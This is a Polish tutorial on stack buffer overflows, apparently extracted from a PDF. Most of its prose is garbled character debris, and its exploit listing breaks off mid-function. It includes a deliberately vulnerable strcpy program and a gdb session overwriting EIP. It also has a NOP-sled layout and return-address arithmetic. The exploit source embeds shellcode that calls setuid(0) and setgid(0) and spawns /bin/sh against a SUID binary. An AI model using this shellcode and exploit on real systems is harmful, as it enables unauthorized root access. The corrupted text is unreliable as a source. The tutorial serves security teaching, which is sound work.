Bufer overflow

by Adam Zabrocki (pi3 -

pi3ki31ny@wp.pl

)

(

http://www.pi3.int.pl

)

:VW S

"!$#&%(')+*,-#"*"".//01*"1*

23-4

5

6718:9&;=<$>(?6$@BADCE"9GFHIH67HIJ7LK1M$I7L9

N

O"P1Q/R/P QTSVU/QBRBUWOXP Y[Z1WD\^]`_$abRBcWDde/fhgiQTjZak"YlP

m

n:opq&rtstuv(wJqyx1uiz[{B|$p}xpyx~|D-p/v}x u&|$wqT€DrD`u:‚„ƒ†…l‡Lˆ‰p|

nXxŠB‹Œ}$pŒ‹B{Dq

w}uŽ€$w$1u/pVs’‘

“•”—–`˜™Œš›(œŸž V¡t¢•›£$Ž£ Ž¤¦¥$§$›¨V©¥ª[– £«¬­¤

›šD¨®›Dži¨- ¯y›i¤G £«¬

£«š(¨V©/¯&¥°

±1²³´$µ¶¸·+¹D³DºµV»¼½(¾-¿DÀi¾®²Áy¼Â-ô$µÄB³´$µB¶Å

²ÆÁ¿Ç

ÈÉËÊ-É/ÌÍiÎVÏÑÐ$ÒiÓXÔÎ/ÕÍiÔ1ÎBÖ×ÒØÈÔÎ/ÒÙ-ÚÊ-ÒÛÈDÜDÝ

ÔÌBÞ

ß

Û

àáãâäåæèçéëêŸìäDàDí

îðïâñ-ìîŸåê-òôó$õóDæöâñVäDà$÷Bø¸ïDùú/ìDûáüóDñ-õ(ýiñ-âíyåþ®ÿ1à÷îBäDà$÷ø

òtêiþ®ÿ

ïDùBìÿ`ûñ+à

íõiê

"!#!#$%&'()*+%&#',', -(. /',0$214356087(!9!2:";<9=6$>?"@:A!#,BDCE@):! )

w biblioteczce ANSI funkc

BD=#F(:HG)I!$@J) K(8BLCK&#7(M4N8ON8"C

P(QRTSUVW XYZ[]\LW ^UW_)P`aEbX(cYOd(eIU

c+W^#fZ [hg`X^Z)\LfiXWjbk8lmafn8V(o Ypf$XXYaf

strcpy(), strcat(), sprintf(), vsprintf(), gets(). Niestety

bezpieczne funkcje takie jak fgets(), oraz fgetc() czy getc() i getchar()

cHb kqaUP(lsrJSURKUVUR

Wt

rJo^UVYS_o YKX#f"buR2vAWw4Z8fxRyYazf"Z [K`k

{|}x~6€‚#ƒ„(…}(†"~ƒI‡ƒ(‡~#ˆ‰Š‹#Œ-‡†ˆ$Œ8€Ž…8/†+ƒy†+Œ‘H~‹’#|“uŒ‘4”•~– {(—‰ ‹Œ-—

‡#u†Hˆ"}˜‰™“D‰’ƒ?ƒšŠ)‰‹#}"| …‹}›’Ž“LŒ,“œ“uŒ†~/†+‰‹‰—K}‰‹({’#ƒ‹}$Œ|‘‡#ˆ}$’~ž}Ÿ†+‡6

 

Œ„‹#‰ ’¡†+ƒ¢‹}$Œy“DŒ)†O“uŒ„{‹({i‡ƒ#4£(¤¥‹#‰‡Š,…8Œ“u|}Œ’#ƒ‹†"Š)ƒˆ"}¦‹‰„§—IŠ)‰–

¨©xªy«¬®­¯)°±¯² ¬³ ¬q´‚µ¶‘·u³¸

zcze

² ¹² º©‘°(­² ¯¹+³¢»#²q¸¹³¯)¼8©"³¡½+¾#³8²­¿°À³¯Á)¨$°ªKÂ)ÃÄ°(¯)² Åq°Æº¯H«(¹+³Ç¼²È"º©$³ ¬É»#©$³Æ² ªI»#°i²¹+² º©]ÆÅ©›ªy»«¼¾¿¼8©¶8±(ʪ

Á,°¯¬² ¹AËD·D¶8¼ «#¼ ¾9½Á°(¯¬²u¹¦¸)¹+¯©x»#±¸JÂÍÌ(Φ³2°#¸¹+² ¹A»©$³¸J¶K°¹«#¨"³¸/­#³¼u«œÁ©¼Å»³Ãœ©$ÏyŲ Å ªI«¼ Ų·ÄÐÈAÑÆ«ž¹³K¸Í¶I­¯°¸)¹,¸Å³

ªÒ»#©$³‘¯)°Ð©³ »©xËE©¼ ¾»©xϑ­#°­¯,Å8³Æ(»#©³Ìӑ­#² ¯H¹+³2¸4¶Ô°»³‘»²IÁË»º¼

jach z rodziny *printf() (syslog() tez).

Õ

»#©$»#©$³,· ¸/Å «¬Ö²¯H¹"«ºË#¨³Ô­#°¸¹² ¯² ¬m¸D©$ё­¯,Å «Ð#¨©$Ï «×¦·D²ºªI«º°(¯Å«œ¸)¹²8×y»#©$³Å ªy«º#¨³Ô­°(­Ë¨$²¯,»³ÔÐÈ+Ñ8Æ«?¹"«­Ë

buffer overflow (BO).

2. Teoria

ØÚÙ ÛÜÞÝß)àÝ8áâã$Ùä8åçæLè éêâàëì#è¡íÔÜé#àßÝÜî)ïHèäÇÛðAñ

òó¿ô"óõöê÷]øpùAôúûýü#þ8òþ¡ÿ(û

ú2ú ô+ú û¿ôóõö

buffer

overflow -

õ

õ

"ú

üö,ÿ)úúDõ

ô

üú

ò

ô

)ÿö!"

Dúû#

%$

ô&ÿ'ú(ÿKúó

õ)ÿ)

$

õú!*"þ+)%,.-/)ÿ)

%$0$

ûAú8òú

$

þ

1243+5617839:;<=2>1%?+;<A@B2C>?DFE@G2>?DH:I24?+5.@G2J.KL@G2>?DH:=M3N"OQP%;OSR>31

strefy stosu. Dwie pierwsze strefy praktycznie nie m

J.@1TVU:XWV19X39X?YU:8M>1?M>R783+Z1%OW[3\2435/]

^

1:N`_%?bac?@2d78OQP;eR7[:0243ac?Nf9OQ;1:f@B24RX@hg

i

24j_ka\?%@2lR9=U.mQR5.OQ?+NnMX3NoOQP;OL1378OQ?+>3pacT%;\:qZ39?]/rts>J9X;OQ?>1%?;1

y sam jest abstrakcyjnym typem

danych. Stos jest typu LIFO (Last In First Out).

^

<RZ1OY2JuR24RXKeOv_wRX@G2H32C9OxRU.OQ?52

52Hj>:yUXP+Z1OQ?

MRzR_%R9:*9X3@B24RX@cOQ?KUXP%Z1OQ?x1ZFahP

{C|k}\~€.‚Qƒ+„…8†‡|/ˆ‰hƒ†G{Š{H€{|"‹%~Œ€…‚Q‹‚Qƒ0€…[„€{Ž|"€ŠŠ‘“’4”‚(„B†G{Ž

‚v„B†B{•‘e–{4—˜”{H™„|A†š‚Q›*‹œ~„~+{Hƒ„|‡–c}h›8{|"˜Šž%ƒ‚ƒ„…†B‡|Ÿ€ ‚ƒ{¡X€Œ€ž€Ž|.˜Š X›%‡%‚ƒ¢„™…xŽ‚ƒž.‚Qƒ+„…8†‡|

‡š}h›

£¤¥Ÿ¦§¨0©£ªX©š«¬Y¥"ª­®X¨V¯e¤°ª®¤¯0¨±V°.«²(°¨eª³X¬´G¨+µ

¶\«C·š¶h¬¸®¨°®¨¶hµ¹º»µ%«¬¶¼ª³.«C©¤¯#¨+®X¬[©š½e¸¯0«¬¦¾c¬©£¿£4ª

ÀÁXÂÃGÄÅpÆcÄÈÇdÉÊËÌÀÃGÄÍÈNJÎeÇSÏÐÇdÉ¢ÊËÒÑÀÑÄÆ\Â*ÆcÂ%ÑÂÓÔÂÕCÂÖ*ÂÓ×8ÓXÄÈØ0ÙÂÃÍÅ+ÚXÀÛÂÜÞÝB×4ÀÝBß.àVÓÄ\×4ÀÖoÙQÄ%ÝB×8NJÎeNJà

ÀÑØ#ÃÀ×CÓ.ÙQÂ*Ó.Ù(á"Ç/ÉÊË0àLÍÑÂpƚÖßhÆcÂVÆ\Â+ÑÂÓAÂ%ÕÂÖfÂ+Ó×HàSÄ"Å%À6ÍÄ¢×CâÖãÙÑÍ%ÙCÂfÃÂ+ÑßÜßcÆcÂoÀ=×HÂÓAÂÕQÂ+Ö*ÂÓוÃGÀÍ+Ö"ÙQÄ+Ã

stosu. Rysunek 1 opisuje operacje PUSH, a rysunek 2 opisuje operacje POP.

äÐå.æçèXéêLë%ìí”îêïðçhñcéeîòXéóGï+ôpñcõVídö÷ø¢ì

ùÐú.ûüýþÿ

ÿücþ

þ

!#"%$'&(*)&+-,./(102$43)"%!/(1576

-

.83:9<;=&>$?0@7+A5B!?0C;C"D56@27E?)/FG5$'&(1)&+H?3:)827@IJ(K5$-&(1)&+MLN0B@O0J;P&@5

&(10FDQ407R/6S5&TU0

A5V8)W6S)@LX"Y06[Z86@Q8@!?0;B07!/QXR?\Y0=0Z#\]"%$072^AJ"A5&S(RQ8!?0LN"D2@!#"]5CR)Z?0&>);_Q8;C0!/QNZ86@5@[AJI7R6)

&Q#&S(K5LW+`,1Z6@57@a27)b.83b@LN"]5!#"Y0c&;B)dAIe;C06(1)?fhg9hH_3U6S)275&>)/6'+8iQ8;B0kjK+8!8$2^AJ"P3UlW./mn)/6S0@o3qp3qT=r8Q

+@+8Z5F]!#"Y0g_&(*)?&H

.(*)&s;b@0\]5i7!)?f2O")8R'"tLWZ\]5Lu57!/(*072SA"vLu)/i5P6S)?&>!?Igw;xR8yF*Tz\t+r4;xV8y6S{N,K2

|?}8~/€vD‚ƒ}-„7~…†O‡ˆ:‰#Š‹}8Œ/

}/Ž?†N8ˆ?u‘’ˆ8“O‡>†•”%‚8–Ž€%“‡†u‘x„”]†“7Ž?}?—h˜€[}~•„ŒO™Gš7€Y„Ž€]„•‡h€]šu‘›‡*}?‡hœh‰žŽ?„‡7ˆ?˜|–Ÿ8…ˆ 8™1„~8„˜|¡‡1}?‡

š7~€Y†’…}‡Ž7’‘¢~£™1¤¥Ÿ?}/Ž€Y†‘C„“B1„7 ¦†‡q‘§‘w€Yš ¥‡O}?—

¨O©Uª8«S¬¨7­®>¬«¯O°`±1²ª:³´K²?­µK¶]·#¸¹¬µ1¬«¬¶]º·q»/¼U½’¾s¿o¨À7Á

¸‹´K¼z»Âh³»8¼‹«¯O°_²#©]­ÃWÀOº¶Y­ÃÁ–¬8ă©%ÅPª#¶]­ÅN­7²/µ1º¨Æ©*³

¸Ç¬/íN¬²-°P®ÈºÀÁ8°CºÉNº¶tʬ•²?ºN¬®µ1ºµG²#©­¶Y­7Åu­²/µË®µ*¬?®>Ì·

ÊÍ7ÄÎϲ?ºs²º®µ1Ъ²/Á=°=¬¶%²/Á=ª?¬u®SµK¬?®h©D­/³¸ÑÁwª8«^ÀÁÆÅN©Y­7ÅPÁ·©tÃs°P®È?º7ÀÌƭϬ/²=²?º_¬?®µ1ºJµ1²©­O¶Y­ÅM­²/µU²º_®µ*¬?®©Y­8³

ÒÓȺÃÄÁ8ÅÔª8«¬8ÕO«Sº7ÅM©Y­ƒ©G®µD²©D­Æ­4°w©Y­O¶Y­ƒÖ*̲8ȨƩ³v¼:¬Ä8¨7Àº®WÌ8«Ì¨×?ºÅN©Dº²#©YºBƺȩY­^ÆØWÖKÌ8²8ȨƩ]·<²º–®SµK¬?®N®dÍ

ÈÙGºÄ/À©Y¬/²?­WµKºÈƒÀ°=º

²­u«SºÅWÈ#©]·ºuª?¬4ÀºÈ?¬

Ú?ÛÜOÝÞ#ßtàáß]Ûâ–ãÜßDäåGäÞß]äWæäçuèß[é>ê

ëì8í^îdïNðOñ=òóí/ô¥õ<òJñwöYí÷òîøNðó?í

ù

ò÷Sò7ïuíúG÷KûWüKý8óþ?ÿîöîí^îYð/þ?òtó?íëïMö]íóó?í?ö¥ì8òóísó#öYíë7ì/ó?í_ì8ð=ðìOúDñCð÷Sëíó#öYò

ù

ð

ù

÷^ëí7ì/óöYíSî[÷Sò7ïWþöú*ðý:ô

oöYí]íþðï

ù

öDòJú1ð/÷Oñ

ý

"!$#&%(')!$#*,+-/.10234056784:9;<20>=/?@9BACAD/EGF03H

alnych jak i

I

B?JBKL3

I

0A-96B4/MN96DBEO02CFP5Q0R8S0C2T!$#UAV96W VF6PX=/?Y96BAV9

I

0C2D/=Z<H-03AA-96S9[AV H-D9

#]\>^_`9a#]b#dc3!#ef]AV9DB=/?g9hAA?iD0"ja#k+C-FlMlA

I

,0D3m0DE"nAQF6AB=/4:9;opBA>fq!#qc

j]#@=rH0F6s9Bt3a",H-/u/AV9hH-9B?vB?1H-9%(j/?Jr#w0A(/

– wskazuj

lA-o,/?"H-;o`,(0-x9/*:c

#w9/p",=ey=D/=zt/H{0.-9}|Q CAH-Dyf~f,}(0JH-021=B7BA

I

0F0PC96B?&c#}0CF6P03AGA-C?@+9hM

I

=sm 4/A

f,~^#&0=K03y=03A1A-0e1j]#%(!$#]*+-.Y,40=BV8r?@9yxD2CF6<A-07$/?1H-9w%(/?"H-<A07r|( CAH-Dy9[*:c

€"

I

9/pH-0

I

904/A-&t,G7Bpp0R8‚/H F[AsP

0ƒ^C#i20„j]#g%(!$#w*+7.ƒ40=B8…A03†j#g%Q!$#w*+>

A-(;

I

A-96

I

=m 7BAY7^#)c)#a=/XetBRmDs96 S=‡|p AH-D9,Q01?J a:9=s0-,Qs8ˆeD/=/V=DB=03AV+‰pBHV9H0C2

zwany jest epilogiem funkcji.

Šd0.DB=/?17A-

I

y=BH5Q2=9kBH123=9B5(

I

0F0P7%

I

=H5Ks2792s8lA-<F9Q9hA-P3 Œ‹f*

Listing 1. prolog.c

void funkcja(in a1, int a2, int a3) {

char buf1[5];

char buf2[10];

}

int main() {

funkcja(1,2,3);

}

^CH03?

I

9F[ tfB?14(B=r(BA

I

0CPB?v=<0

I

Df{

-

^>.> 40=B8rH0C2e„3xxB?J.-FB=

# cc -S -o prolog.s prolog.c

# cat prolog.s

Ž

VR,796BpF9t96;A/?

02

I

0379623AV9hH

fm?1.-F6/0e]c’‘“0M/A”

AV9h?

H-9KFhH”7BM/AD/E

=DB=

=s03.amp034s8cC#w0

I

96p7m=s4492=9h?1G •

I

sDBV|y96D/=A{<5KRmDs9[0-Rm8<eV,Q;

I

ff{sD{

I

02CDB=s3–DE0C23=s/A-9

2C0T|p AH-Dy9Qc–br(L3MXB,P ?G/A—|Q AH-Dy9<:{

I

035K0M03A-&˜023<03KA-ZH0CF:A-0R:Ds9pczb,QBAV9r/P ?GAd,

HC5Ks2=960A$fBH0

I

96/p"=BV+

rAexB?vH0A-96sD™f,a<035QBAV96<|p AH-D9

pushl $3

pushl $2

pushl $1

call funkcja

Ž

92=9h?1š -+e9hMWA“,(0&x{‡H5(23=39603A-›0203AˆH0CFxA0R:Ds9eB,P ?G/A]cb,(BKA-9eBP3 ?G/A~,

I

035K0M03A$tH0

I

96p7m=B]c/€"lH-03A-9D™f,ae05(BAV96

A-m=s$|Q CAHDf9

I

0

I

=s/=<DFF+HQL3

I

035Q03MB7A-e(0

œ",ž-Ÿ/ /¡V¢hžˆ¢6¡V£(¤¥ž-¦§¢™¨Q©pª

- Instruction Pointer). Jest on potrzebny do tego, by procesor podczas, gdy

mž«¬¦B­/®Gœ®ž-«3¡®œ4Ÿs¯‰§tŸ/ž°3±o²(¥¡Cž¦§t³s´ˆœ7¢6³sµ3­3¢6ŸB¶q·µ­¢³e¸@Ÿ>t¢6¹

º»¼½C¾s¿6À

”

¿]¾sÁ"ÂGÃ<Ä-ÃÅ,ÆQÇBÈCÄ-¿6É<»<ÊËÁÄÊ»7ÃÀ

Ì

Í

Ã/Ë-ÎÏÁÈÉ/¼Ã¾

Í

ÉÐ:Ñ4ÒlÇÓ3Ô¿6É/Â"ʃÕÁ†Ä-ÃBÔBÊ»7ÃÀÏÖ$×)Ø~ÙJ¾/ÔBÊVÚ¿@ÃÓ3¼ÉÅ:É/ÂÛÈÁ»¼Á3ÆÄÊ•ÑÜdÁÝþÔ/Â"ʆÆQÉ/¼ÃBÔ

Í

Ã/Ë

»eÊÕÚ6ÎsÓÃrȼÁÚÁÕÞ

pushl %ebp

movl %esp,%ebp

subl $20,%esp

ß

¿ÓÔ¿hÂ1ʚÆà-Ùe¿háWÄÓÅ,Æ(ÁÅ

Í

ÉÅ,Æ4ËâKÃÓ3Ô¿Á3Äʚ»>ÅË-ÃBãÄV¿h˚¼ÃÂ"ËV¿r×dÒ$ä

Ì

Ô/»4Ã/ÄʚÆ(ÉBáWÒä`ÚhàݗåaäwÐÙoÄ-ÃÅÆ(ÇBÈCÄ-¿É

aktualny adres SP jest kopiowany do EBP (nazwiemy go SFP), a sam SP jest przesuwany o rozmiar

Ô/ÂY¿6É/ÄÄʾ/æ“ÚÁ3ËÃÚhÄÊ-¾/懻èçQàCÄË-¾

Í

¿QÑ

ß

Ã/á/ÄÃ

Í

ÉÅ,Æ¿6Ä-çyÁ3¼ÂGþ

Í

Ã&ÁŒÆÊÂ@Ùz¿háˆÈÃÂ@¿6ÇsÀZÂGÁ3ásÉZÝÊÀ•ÃsÓ¼ÉÅxÁ»4Ã/Ä-Ã

ÆÊVÚ[ËÁG»4¿ÉsÚ6Á˼Á3ÆKÄÁ-é

êë6ìBíYëqîmïKðñ7ìsòóôQõ3ö,÷ñƒøìîmùBúíüûCöùBúû-ìý3óCþ@ñeúøð-îxëkÿìmôú[þ-ëhô

y -

ùsì6÷/ú@ô(ð

ðCýWûöðê÷î:ðöì)ì/óSñ7ësê•ñQþøCóêfëîý3ñ4ìCþyð3öpú

-

! "$#&%('*),+-"$.&/'0 1324 6587:9<;=#&%>?)A@B0C'DFEA%

/0?5G@0C'%HEI9J"K#L

M?NOGPQR3S6Q4TVUXWP!Q<Y$Z&[\N^]`_VWP!Q<Y$a&[(bcd-Y$Z&ebV[feO?TGMOCb[HNIgJYKah<M?NOGPQR3S6Q`Ti]6jHWP!Q<YKZ&[3klmPBd>[HNn?M

SP jest przesuwany o 20 bajtów (subl $20,%esp). Stos

oPgpOq[Xbr-sItBuPXYKTePCO>R3oNTQv[HNnBM?TQwYKPCdxQ`PCdyoP

rysunku 3.

z

b*g<S-oTd{|kG}~a&dPCOS4Q6TQ4PdV[(brstGuP(gpY$agk

€

eZW-S6Q4TCR3b‚YKTCeJPCOƒ[(bda&oPB„…Y$T?a&eJT`YFbMBOoTƒRiPB†=T



e!OGT



TC†Fo*NTBoNT…W-S*‡aeP…oP



earePRNFT‰ˆNMCYŠN‹R]GkŒMGcd-YKZeŠb

widzimy na listingu 2.

Listing 2. victim1.c

int main(int argc, char *argv[]) {

char bufor[100];

if (argv[1]==0) {

printf("Ussage %s <argument>\n",argv[0]);

exit(-1);

}

strcpy(bufor,argv[1]);

return 0;

}

lTo



eagYIb



earePCR



eOCb6QR3S4Q6TPer&S-RyTCoY,NŽrada



NS4Q6THuaiW-S*‡aeS



e!O?TCOi‡KS-odM!Q6nGcd-Y$Z&ePVoNTig



eP`[Vu&OP

u†FSrah

M?NxMGNItBrS



au-PBoTQusFP‘o*NTQXQ6PBda’PerSRyToYq“gJYIeJM



b*“K””k•PGa[Va-MGa[VPB„YKaRa&–GT



eOGT



T†FoNITCo*NTCR

WS‡aeScmru&b



a-uPRbHQ6Pda‘Per&SRiToY—MNtBr



eO?Td-ePGMCO?P!Q6t?M`b˜NFsIahp„3R‰NT!QCgMGP[™WS‡aeO?TNšRya&–T3oPBu



N$g<P?„

PGu&eT&g



a[qea&YIob

‡KSo-dMQ4NŠk\}eJa-MBTgae›da&œMCO?tGM[(b-da&oPCoNITž‡KS-odM!Q4NŸWnGu&ONFTR‰NP† PGu&eTgc

który



eP`[Vu-a



a-ua&WoNT(oNFTmQ4T?gpY



eOGTOBoPGMCOa&obyusP(o*NTGr-a3N¡MBP†$PxYKPXa



TeP?MQ6PVg<daœMCOb‰gNn(W-†=n?u-TRŸgTGr&RiToYKPGMQ`N

“

€

TBrRyTBoY$PCYŠNao3‡PBSs¢Y$”k?•u-TW-SrS6QRb>YKTePOxoPgpO



eJarePCR£Wbig6Nn¤Y$TCRiS



eOb6QeOGT?„

– listing 3.

¥¦$§¨¦‹©ªV«|¬G­>®C¯°ª±&²>³©¦I®w´-µ±ª&µ³¶°·¤´-µ·B¸-¹-º$³B»&°¼¬

root@localhost:~# gdb victim1

GNU gdb 5.0

Copyright 2000 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-slackware-linux"...

(gdb) r `perl -e 'print "A"x108'` // komenda “r” oznacza “run”

½B¾C¿ÀFÁÂýBÄÅÆyÁFǤÈ-ÃJÅ-ÉÃÊƉËʤÈÅ>Ì*ÁÍÎ

//

Ï6ÁÐxÈÅ-ÑÊÎ`ÍwÌÅÃÆÊGÀ‹Ì*ÁFÍwÈÊÃJÊCÆyÍCÒIÿiӊÊCÃJÉÂ-ÆyÍÌ-ÒF¿ÔÕ

Starting program:

/root/victim1 `perl -e 'print "A"x108'`

Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(gdb) info reg eip // info pokazoje informacje o czym chcemy reg to skrut od

// registers – czyli rejestry a eip to nazwa interesujacego nas

// rejestru...

eip 0x41414141 0x41414141

(gdb) quit // wychodzimy z programu...

Ö

ÊGÀÍB×GØHÏ6ÁÐXÒI‰ÅÑiÃʾÂyÆÊCÙ=ÍXÚX¿6Î4Ê?Û

Ü*ÝÞBÜÝß-àá(â&ãåä4Þ?æpçŽâÞãèéÞêÞCëíìîßêŠçIïiÜß>ðIÝFñBÞBÜñä`ݼávò>ó3àôvÝõGé

`perl -e

'print "A"x108'`

ö

ïéÞÜÞCê!è6ä`ޑ÷CøùiðI݋ç$ÞêÞú‰û3à|üýÝFþGñHâÞãèéè4ä6ÞCë3ï‰Üß?æ<ÿ

ö

êß?ð=Ý

ö

ï‰î-êìéêßë¼âßä`ÞCëï‰ëiè

!"#$%&')(*,+!-./&1023&!4576&(89%7&:8;4

<=&->28@?4%A.B4C4D!EF

GIH

4C4DJ<LKM4N';OQP4RS.TD?0U055N4!V<W'VKMXI4Y'0.T0FX%7&S()%7.Z057I:2()X%7&[Y(*2+

wynosi on 0x41414141

P5\].I(V.I@C:$%7&.^<?FD(2_N;`D4

A wynosi 65, a co za tym idzie w systemie

szesnastkowym wynosi ona 0x41

P2aZ4&Z^2+b

(5%2EX.^<?c^.T$./5 !%d.Q<?be&< 48f5(!%.#0bI;2(gP

RS./&e< !X02%24(^45L2h>(8gD4%782[i+9&08V[8f>2KE7#j54%0D./48

Hkml

^jnpoqapP7r")(

Y<?4X5:5N<?$4%)02ICd*07VFX+e7+)(C&d<V4s$%7I.t0e:2(C5X%e5N[V<X[(gP2u$N:

!v7+$5W&@!)02E&

(^^%&<wux5SD5*V+!$L+!S(=.I:$M&(5sX>2&$>'M2(U<FypK@2M

G

MF&!?y/M

.IqJ=%$78D<C%z058Dc.I{

- /bin/sh

O,>(=024|05v7}4EU(2758~@0702E&!&S&d<?L4%7I./

0e:4€02& D.T&42>2&>V'5M5mP\

04(5!x2%(WI+N'b(02I

a

ustawiony atrybunat SUID

*bD%7(‚(e8Dƒ2%X78D:„%…0e8;7VY%5.I@V<)(27J.T{!NN:V†e‡D

&!4&(5&Eb5ˆ{5%7&q%7(-F@^^)(dbI+N:'9(=027C*‰{5sXVY&!X./&!

G

20gP5C7+S(d9(8DCs

.^<?&XyT2%Y:.Te{2T27;OQP‡U>24&>'M2()&4($Y(z./{5!N;N<4%24=PRY:9>?4%?0:.B8

^4z.;e7E&(5sX.T$vB

./{5NN!2%2*Z>5ŠC7+4z1:(2‹0V:.Q!sz%2%&N'(J;(228EPhrŒ(>?4%7&S(+(X4sd5z&1.D45%%(

./{5NN!2%22PC\Ž./&(V.T:>(28D7>(>%&‘05.TD!*z2%7(2>(iV’@5*C+€%({5!S(&V<s“npoqa”*C>2(

S.I&(2$8j5•.T&e./{5!N:N4%2*7Je)V.^')(X&5sU%228@4%72(#^!X4%

.PRS<L+5•07S(VNsb.B?•5$g

!%Š>MQ^†—–Z!&Ive<4+=ZLDY^7.#&Y< &V<P—˜I.I;V<M='j.DM2M^)RY‡

l

*~2Dv7<dC>@P‰\

02:(5!q.Th5b2+(2$5b>(C705v}4V<sb024.,&565&V<b02)fPrŒ(pFMt2+(^)(Y>2(S&!0D./s‰F

przed naszym shellcodem bardz

%7+!™&(*ZD%("%(&d<<Y(ŒntoZa’Y.T54&^ !d51[j.DM2M^?

RS‡

l

De>5?%7&<.^<?95p(27(2$!s9%27D %

G

'j.I:E25^tRX‡

l

O*%205v7V2•X./5+p5•02& F@$./&!!2

./{5NN!2%7fP

l

M&(Q)^F 4•@&!.Q!%(Y./&U>2VKM7—0M&!45&!2(#^45X7Lm)V.^<8:>($(52N !%4s9eDhš

[ instrukcje NOP ] [ nasz shellcode ] [ zmieniony RET ]

l

M&(2>VN[+!(1npoqa‚!%7.bL+5d7>N:<&(5s)0502M&&2%B^?!<%z0524&! ;2.I@5.T

G

Jv7J($^eB2+L0;.Q8;

.IŠ&!X./&!‘.TD8:(O›:N5y/sœM./4€&EQ$ “02M&&€./&.I{N:N<!%2*d&@X2(02-P

l

2& DC.I@5.TYC9!%7.

0xc0000000

P7\302M&(>N<+!V[$Db70I!M•(52N< %2pJhš

ret=0xc0000000-strlen(shellcode)-strlen(program)-4;

žFŸ T¡•¢Ÿ /£!¤4£!Ÿ=¢Ÿ!¥7¦5§„¨CŸ¡@©2¥2§ªe«2¡D¬7­§„®¯D§F¡:°X±<§ƒ¦§¨³²V±; /§4¦±Ÿ„Ÿ´²Vµ<©±`¡J¬°L¶·g©µ:Ÿ4¸§ƒ©7¦§„¦5§Ž I¡°X©7­E£!Ÿ¦V±[®“¹

²©7¨C©2¤4¦±<¤£Ÿ4¸2©»º®¼M©­M®ª~°|«¡J¬7­J½¨º¾4¥¿C®2¨±Ÿ T£¤£©¦5ŸC¡½µ'«©±'¦j I¡:­E®2«5¤¢^Ÿ

NOP, oraz shellcode, a jako

§­¸®2¨Ÿ¦¡“¥©‹°e­§Àµ:±`°XŸ4¸©Á²2­©¸­§¨)®Â²5©2¥§¨S½Á¡½Vµ[«5©Áº2®V¼M©7­Tª"«2¡D¬7­M½Â£!§°$±Ÿ­§ˆ§¥7­IŸ i¥©Ã¦§ /£!Ÿ!¸2©

²©7¨C©2¤4¦±<¤£Ÿ4¸2©º®¼M©­M®g¶zÄb¥5µ<Ÿ4¸¯;©5ÅQ¤!±»¨C±<¾!¥7£4½ˆÆ2·‹§‘¼J®2¦2«¤M¢F§¨±-¦§£½2°e§4¨Y½_©5¼E¼I QŸ¡@§¨±J¶LÇc©°e¯;§7Ŧ±:Ÿ

©¥2¸§!¥7¦±:¾4¤±Ÿ©5¼E¼ QŸ¡;®Œ I²­§°X±§¥®2À½»²­©7ºVµ<Ÿ4¨=¶mÈ~´5²µ<©5±`¡,º5¾!¥7£±:ŸS°9½

¸2µ¿!¥§¯Z°X±¾!¤S¡D§«X¢^§4«1²2­©¸­§¨ÉŸ´5²~ʶ

¤

(listing 4).

Listing 4. exp1.c

ËÌÍ2ÎÏ;Ð4Ñ4Ò!ÓÔ)ÕXÖV×'ÖØ;×<ÎÙDÚÑÒ4Û×hÌË

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <getopt.h>

#define PATH "./victim1" /

ËgÜ5ÓFÙ;Ý)Í2ÎeÞßÓàØ×'Þ$Ú!áÎ$ÜßÎ2áßIÓÔ)â

#define BUFS 110 // buffor podany jako argument

#define SHELL 512 // pomocniczy buffor

#define NOP 0x90 // instrukcja NOP

/* nasz shellcode z 2 dodatkowymi funkcjami */

unsigned char shellcode[] =

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);

"\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0);

"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"

"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

ËÌeã@âä2Û5ÑEå^ÓUÛÙDæßÓ9ÎÖØ×:ÑÒ!ÓUÜ2ßMÒ4Õ2ÖØ×[àÎ7ä2ÕSÓ4ÍßÚçcÜ5Î7ÞbßÎ7Ù;äÕdÌË

long ret_ad(char *a1, char *a2) {

return (0xc0000000-strlen(a1)-strlen(a2)-4);

}

ËÌeã@âä2Û5ÑEå^ÓUÛÙDæßÓb×'äVãMÎßMÔLâ^å^Ú~å^ÓÛYâ2àÕÞ$Ó!èäÓç/Ò!Ú4áÎSÚFé5ÜØÎ5×`ÙDÓYÌË

int ussage(char *arg) {

printf("\n\t...::: -=[ exploit na program vuln1 ]=- :::...\n");

printf("\n\tUssage:\n\t[+] %s [options]\n

-? <this help screen>

-o <offset>

-p PATH\n\n",arg);

exit(-1);

}

ËÌáÏ;æ7ÞäÓbã@âä2ÛÑMå^Ó

-

Ü5ÎÑÒ!ÐÙ@ÚÛdÌË

int main(int argc, char *argv[]) {

/* lokalne zmienne pomocnicze */

long ret,*ret_addr;

char *buf,*buf_addr,*buf_addr2,*path=PATH,*sh;

int i,opt,offset=0;

FILE *fp;

while((opt = getopt(argc,argv,"p:o:?")) != -1) {

switch(opt) {

case 'o':

offset=atoi(opta

êIë7ìQíî:îgï5ðEðIñQòómô5ïõ2ö÷2øYô2êEù!òùUúûøó;ü5ïýe÷þ[ü5ö

break;

case 'p':

path=optarg; // path do vuln1 programu

break;

case '?':

ÿ

Yÿ "!#$%

break;

default:

ussage(argv[0])

&'"Yÿ !#(%

break;

}

}

/* Sprawdzamy czy program istnieje */

if ( (fp=fopen(path,"r"))==NULL) {

printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);

ussage(argv[0]);

}

/* alokujemy miejsce na nasz bufor podany jako argument */

if (!(buf=(char*)malloc(BUFS))) {

printf("\nI can\'t locate memory! - buf\n");

exit(-1);

}

/* alokujemy miejsce na nasz bufor pomocniczy */

if (!(sh=(char*)malloc(SHELL))) {

printf("\nI can\'t locate memory! - shell\n");

exit(-1);

}

printf("\n\t...::: -=[ exploit na program vuln1 ]=- :::...\n");

printf("\n\t[+] Bulding buffors!\n");

)+*",-.)+*,0/21354+678*99;:<=3*>@?81,A7=BCEDD?=)F"G=H89&I;J<LKGM13)+*6N?5<O$)+<L,KG

ret_addr=(long*)ret+offset; // dodajemy offset - dodajemy a nie odejmujemy

